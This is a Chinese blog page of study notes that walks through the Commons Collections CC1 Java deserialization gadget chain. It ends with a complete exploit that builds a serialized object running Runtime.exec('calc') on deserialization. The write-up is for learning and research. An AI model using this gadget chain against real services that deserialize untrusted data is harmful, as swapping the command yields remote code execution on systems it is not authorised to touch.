<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Dawn Nine学习笔记
    </title>
    <meta name="description" content=  >
    <meta name="keywords" content= Dawn Nine,代码学习 >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.3.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            CC1
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="Java反序列化Commons-Collection篇CC1链"><a href="#Java反序列化Commons-Collection篇CC1链" class="headerlink" title="Java反序列化Commons-Collection篇CC1链"></a>Java反序列化Commons-Collection篇CC1链</h1><blockquote>
<p>CC链的全程是Apache Commons Collections 中有⼀个特殊的接口它可通过<strong>反射</strong>调用类中的方法，从而通过一连串的调用而造成命令执行，这条链便叫做Commons Collections链（简称cc链）。</p>
<p>版本要求：jdk &lt; 8u71 <a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1giCeK_FRRQJqxhQyS9YcOA">jdk8u64</a>   提取码: 8d5u<br>还需要下载openjdk源码，JDK内部分是反编译class文件需要下载源码。<a target="_blank" rel="noopener" href="http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/af660750b2f4/">openjdk</a></p>
</blockquote>
<h3 id="漏洞环境配置"><a href="#漏洞环境配置" class="headerlink" title="漏洞环境配置"></a>漏洞环境配置</h3><p>打开IDEA 新建一个Maven项目，选择JDK选择从磁盘添加JDK，选择上面对应的JDK版本。</p>
<img src="/2025/12/05/CC1/image-20251205085557719.png" alt="image-20251205085557719" style="zoom: 67%;">

<p>打开pom.xml文件把依赖添加到文件中</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependencies&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;commons-collections&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;<span class="number">3.2</span><span class="number">.1</span>&lt;/version&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">&lt;/dependencies&gt;</span><br></pre></td></tr></table></figure>

<p>打开项目结构-&gt;平台设置-&gt;SDK选择添加-&gt;从磁盘添加JDK，将下载好的源码src文件夹添加到项目中，看到有相关文件夹及添加成功</p>
<p><img src="/2025/12/05/CC1/image-20251207205759137.png" alt="image-20251207205759137"></p>
<h3 id="CC1链分析"><a href="#CC1链分析" class="headerlink" title="CC1链分析"></a>CC1链分析</h3><p>先来分析整个链子的调用过程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">AnnotationInvocationHandler.readObject()</span><br><span class="line">  TransformedMap$MapEntry.setValue()</span><br><span class="line">TransformedMap.checkSetValue()</span><br><span class="line">  	 ChainedTransformer.transform()</span><br><span class="line">  	  ConstantTransformer.transform()</span><br><span class="line">  InvokerTransformer.transform()</span><br><span class="line">     Method.invoke(&quot;Runtime.exec()&quot;,&quot;calc&quot;)  </span><br></pre></td></tr></table></figure>

<p>java原生反序列化利用两个条件，能够被序列化和重写了readObject方法</p>
<h4 id="入口调用"><a href="#入口调用" class="headerlink" title="入口调用"></a>入口调用</h4><p>CC1链入口点在InvokerTransformer.transform()函数，函数的作用是通过一个反射的方式执行一个函数，其中的iMethodName，iParamTypes，iParamTypes为传入的值。</p>
<p><img src="/2025/12/05/CC1/image-20251206170326543.png" alt="image-20251206170326543"></p>
<p>通过这个类成功调用到了Runtime唯一类，并成功执行了calc，下一步就要找那个地方调用了InvokerTransformer类同时满足反序列化的两个条件。<img src="/2025/12/05/CC1/image-20251206170738457.png" alt="image-20251206170738457"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">test</span><span class="params">()</span> &#123;</span><br><span class="line">    InvokerTransformer in=<span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc.exe&quot;</span>&#125;);</span><br><span class="line">    in.transform(Runtime.getRuntime());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="第二次调用"><a href="#第二次调用" class="headerlink" title="第二次调用"></a>第二次调用</h4><p>TransformedMap.checkSetValue刚好调用了transform</p>
<p><img src="/2025/12/05/CC1/image-20251206211318449.png" alt="image-20251206211318449"></p>
<p>valueTransformer的值是由TransformedMap构造方法来赋值的，他的属性是protected，只能从内部调用。目前要解决两个问题，<strong>第一个问题是要解决valueTransformer要给他赋值InvokerTransformer、第二个问题要调起checkSetValue函数</strong></p>
<p><img src="/2025/12/05/CC1/image-20251206211633715.png" alt="image-20251206211633715"></p>
<h4 id="第一个问题"><a href="#第一个问题" class="headerlink" title="第一个问题"></a>第一个问题</h4><p>valueTransformer的值是由TransformedMap.decorate的构造方法来赋值的，他的属性同样是protected，需要再找能够调起该方法的函数</p>
<p><img src="/2025/12/05/CC1/image-20251206212043347.png" alt="image-20251206212043347"></p>
<p>decorate方法可以调用构造方法，属性是public，调用这个方法可以成功解决第一个问题</p>
<h4 id="第二个问题"><a href="#第二个问题" class="headerlink" title="第二个问题"></a>第二个问题</h4><p>AbstractInputCheckedMapDecorator.MapEntry是TransformedMap的父类，当调用父类setValue方法时会调用自己的checkSetValue</p>
<p><img src="/2025/12/05/CC1/image-20251206214124449.png" alt="image-20251206214124449"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">test2</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">     </span><br><span class="line">        HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">&quot;key&quot;</span>,<span class="string">&quot;value&quot;</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; transfromedMap = TransformedMap.decorate(map, <span class="literal">null</span>, invokerTransformer); <span class="comment">// 设置valueTransformer的值</span></span><br><span class="line">        <span class="keyword">for</span>(Map.Entry entry:transfromedMap.entrySet())&#123;</span><br><span class="line">            entry.setValue(r);  <span class="comment">// 调用checkSetValue函数</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2025/12/05/CC1/image-20251206222527594.png" alt="image-20251206222527594"></p>
<h4 id="第三次调用"><a href="#第三次调用" class="headerlink" title="第三次调用"></a>第三次调用</h4><p>需要找一个能够序列化、重写了readObject方法并且还要调用了setValue方法，AnnotationInvocationHandler符合上述条件，首先先来看一下这段代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(java.io.ObjectInputStream s)</span></span><br><span class="line">        <span class="keyword">throws</span> java.io.IOException, ClassNotFoundException &#123;</span><br><span class="line">        s.defaultReadObject();</span><br><span class="line">        <span class="type">AnnotationType</span> <span class="variable">annotationType</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            annotationType = AnnotationType.getInstance(type);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(IllegalArgumentException e) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.InvalidObjectException(<span class="string">&quot;Non-annotation type in annotation serial stream&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        Map&lt;String, Class&lt;?&gt;&gt; memberTypes = annotationType.memberTypes();</span><br><span class="line">        <span class="keyword">for</span> (Map.Entry&lt;String, Object&gt; memberValue : memberValues.entrySet()) &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> memberValue.getKey();</span><br><span class="line">            Class&lt;?&gt; memberType = memberTypes.get(name);</span><br><span class="line">            <span class="keyword">if</span> (memberType != <span class="literal">null</span>) &#123;  <span class="comment">// i.e. member still exists</span></span><br><span class="line">                <span class="type">Object</span> <span class="variable">value</span> <span class="operator">=</span> memberValue.getValue();</span><br><span class="line">                <span class="keyword">if</span> (!(memberType.isInstance(value) ||</span><br><span class="line">                      value <span class="keyword">instanceof</span> ExceptionProxy)) &#123;</span><br><span class="line">                    memberValue.setValue(</span><br><span class="line">                        <span class="keyword">new</span> <span class="title class_">AnnotationTypeMismatchExceptionProxy</span>(</span><br><span class="line">                            value.getClass() + <span class="string">&quot;[&quot;</span> + value + <span class="string">&quot;]&quot;</span>).setMember(</span><br><span class="line">                                annotationType.members().get(name)));</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>for函数遍历的memberType 要为我们可控的map，memberType是由构造方法进行赋值的，构造方法需要传入注解和Map的值。</p>
<p><img src="/2025/12/05/CC1/image-20251206225242683.png" alt="image-20251206225242683"></p>
<p>先来尝试调用到AnnotationInvocationHandler.readObject方法，声明序列化方法和反序列化方法。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.FileOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CommonsBeanutils1</span> &#123;</span><br><span class="line">    <span class="comment">//定义序列化方法</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object object)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;CC1.ser&quot;</span>));</span><br><span class="line">        oos.writeObject(object);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//定义反序列化方法</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">unserialize</span><span class="params">(String filename)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">objectInputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(filename));</span><br><span class="line">        objectInputStream.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">test3</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">    <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line"></span><br><span class="line">    HashMap&lt;Object,Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">    map.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;value&quot;</span>);</span><br><span class="line">    Map&lt;Object,Object&gt; transfromedMap = TransformedMap.decorate(map, <span class="literal">null</span>, invokerTransformer); <span class="comment">// 设置valueTransformer的值</span></span><br><span class="line"></span><br><span class="line">    Class&lt;?&gt; c = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">    <span class="type">Constructor</span> <span class="variable">annotationInvocationHandlerConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">    annotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">    <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationInvocationHandlerConstructor.newInstance(Override.class,transfromedMap);</span><br><span class="line"></span><br><span class="line">    serialize(o);  <span class="comment">//序列化</span></span><br><span class="line"></span><br><span class="line">    unserialize(<span class="string">&quot;CC1.ser&quot;</span>); <span class="comment">//反序列化</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在readObject方法中打断点成功调用到该方法</p>
<p>问题一：Runtime不能序列化</p>
<p>问题二： 如果要执行到memberValue.setValue首先要满足两个if条件才能调用</p>
<p> <code>memberType != null</code>和<code>!(memberType.isInstance(value) ||value instanceof ExceptionProxy)</code></p>
<p>问题三：memberValue.setValue()里面的值好像不可控，我们最终要传递的是<code>Runtime.getRuntime()</code></p>
<h4 id="第一个问题Runtime不能序列化"><a href="#第一个问题Runtime不能序列化" class="headerlink" title="第一个问题Runtime不能序列化"></a>第一个问题Runtime不能序列化</h4><p>Runtime的class是能序列化</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line"><span class="type">Method</span> <span class="variable">getRuntime</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">R</span> <span class="operator">=</span> getRuntime.invoke(<span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line"><span class="type">Method</span> <span class="variable">exec</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;exec&quot;</span>, String.class);</span><br><span class="line">exec.invoke(R, <span class="string">&quot;calc&quot;</span>);</span><br></pre></td></tr></table></figure>


<h4 id="第二个问题两个if"><a href="#第二个问题两个if" class="headerlink" title="第二个问题两个if"></a>第二个问题两个if</h4><p>在readObject方法中打断点成功调用到该方法，如果要执行到memberValue.setValue首先要满足两个if条件才能调用</p>
<p> <code>memberType != null</code>和<code>!(memberType.isInstance(value) ||value instanceof ExceptionProxy)</code></p>
<p><img src="/2025/12/05/CC1/image-20251206232601301.png" alt="image-20251206232601301"></p>
<p>第一个if(memberType !&#x3D; null)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">annotationType = AnnotationType.getInstance(Target); <span class="comment">// 获得实例</span></span><br><span class="line"> Map&lt;String, Class&lt;?&gt;&gt; memberTypes = annotationType.memberTypes(); <span class="comment">// 实例对象转化为map</span></span><br><span class="line"> Class&lt;?&gt; memberType = memberTypes.get(name); <span class="comment">// 根据map的名称来获取value，如果不存在返回NULL</span></span><br></pre></td></tr></table></figure>
<p><img src="/2025/12/05/CC1/image-20251207001747687.png" alt="image-20251207001747687"></p>
<p>传入进来的map和传入进来的注解里的值是否由匹配，如果没有匹配返回NULL，如果有匹配，返回对应的值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">map.put(&quot;value&quot;,null);	// 因为Target注解中里面有value，要匹配过第一个if</span><br></pre></td></tr></table></figure>

<p>第二个 if (!(memberType.isInstance(value) || value instanceof ExceptionProxy))判断是否能实例化。只要匹配一般都能实例化，第一个问题全部解决。</p>
<p><img src="/2025/12/05/CC1/image-20251206224547538.png" alt="image-20251206224547538"></p>
<h4 id="第三个问题setValue不可控-难点！！"><a href="#第三个问题setValue不可控-难点！！" class="headerlink" title="第三个问题setValue不可控(难点！！)"></a>第三个问题setValue不可控(难点！！)</h4><p>setValue里面的值无法控制</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">memberValue.setValue(<span class="keyword">new</span> <span class="title class_">AnnotationTypeMismatchExceptionProxy</span>(value.getClass() + <span class="string">&quot;[&quot;</span> + value + <span class="string">&quot;]&quot;</span>).setMember(annotationType.members().get(name))</span><br></pre></td></tr></table></figure>

<p>ConstantTransformer.transform()方法可以解决这个问题，因为这个类的方法，在调用过程中只于构造函数时初始化时有关，和调用时输入的input没有关系</p>
<p><img src="/2025/12/05/CC1/image-20251207201552320.png" alt="image-20251207201552320"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Object</span> <span class="variable">constantValue</span> <span class="operator">=</span> <span class="string">&quot;Hello, Transformer_exec!&quot;</span>;</span><br><span class="line"><span class="type">ConstantTransformer</span> <span class="variable">constantTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(constantValue);</span><br><span class="line"><span class="type">Object</span> <span class="variable">result</span> <span class="operator">=</span> constantTransformer.transform(<span class="literal">null</span>); <span class="comment">// 调用输入为null,返回 &quot;Hello, Transformer_exec!&quot;</span></span><br><span class="line">System.out.println(result);</span><br></pre></td></tr></table></figure>

<p><img src="/2025/12/05/CC1/image-20251207202352055.png" alt="image-20251207202352055"></p>
<p>所以我们的代码应该这样写</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">ConstantTransformer</span> <span class="variable">step1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class);</span><br><span class="line"><span class="type">Object</span> <span class="variable">runtimeClass</span> <span class="operator">=</span> step1.transform(<span class="string">&quot;aaa&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">step2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;);</span><br><span class="line"><span class="type">Object</span> <span class="variable">getRuntimeMethod</span> <span class="operator">=</span> step2.transform(runtimeClass);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">step3</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;);</span><br><span class="line"><span class="type">Object</span> <span class="variable">runtimeInstance</span> <span class="operator">=</span> step3.transform(getRuntimeMethod);</span><br><span class="line"></span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">step4</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">step4.transform(runtimeInstance);</span><br></pre></td></tr></table></figure>

<p><img src="/2025/12/05/CC1/image-20251207204715339.png" alt="image-20251207204715339"></p>
<p>通过代码可以发现这个调用链和ConstantTransformer.transform输入没有关系，只和ConstantTransformer初始化有关系，根据代码发现，每一个调用的都是前一个的返回值，ChainedTransformer类刚好有一个treansfrom方法，进行递归调用。</p>
<p><img src="/2025/12/05/CC1/image-20251207205252083.png" alt="image-20251207205252083"></p>
<p>所以使用ChainedTransformer.transfrom进行调用</p>
<p><img src="/2025/12/05/CC1/image-20251207205515162.png" alt="image-20251207205515162"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>CC1链对于我来说还是比较难的，其中setValue不可控，绕过这个问题我断点分析了挺久，有些地方参考了下面的几位师傅的文章和视频才明白。</p>
<h4 id="流程图"><a href="#流程图" class="headerlink" title="流程图"></a>流程图</h4><p><img src="/2025/12/05/CC1/image-20251207205640611.png" alt="image-20251207205640611"></p>
<h4 id="CC1完整EXP"><a href="#CC1完整EXP" class="headerlink" title="CC1完整EXP"></a>CC1完整EXP</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> org.junit.Test;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="keyword">static</span> org.example.CommonsBeanutils1.serialize;</span><br><span class="line"><span class="keyword">import</span> <span class="keyword">static</span> org.example.CommonsBeanutils1.unserialize;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Serialcc</span> &#123;</span><br><span class="line"><span class="meta">@Test</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">test6</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedtransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);   <span class="comment">// 链式调用InvokerTransformer.transform</span></span><br><span class="line">        HashMap&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">&quot;value&quot;</span>, <span class="string">&quot;value&quot;</span>);</span><br><span class="line">        Map&lt;Object, Object&gt; transfromedMap = TransformedMap.decorate(map, <span class="literal">null</span>, chainedtransformer); <span class="comment">// 设置valueTransformer的值</span></span><br><span class="line"></span><br><span class="line">        Class&lt;?&gt; c = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">annotationInvocationHandlerConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        annotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationInvocationHandlerConstructor.newInstance(Target.class, transfromedMap);</span><br><span class="line"></span><br><span class="line">        serialize(o);  <span class="comment">//序列化</span></span><br><span class="line"></span><br><span class="line">        unserialize(<span class="string">&quot;CC1.ser&quot;</span>); <span class="comment">//反序列化</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参考<br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/390210.html">https://www.freebuf.com/articles/web/390210.html</a></p>
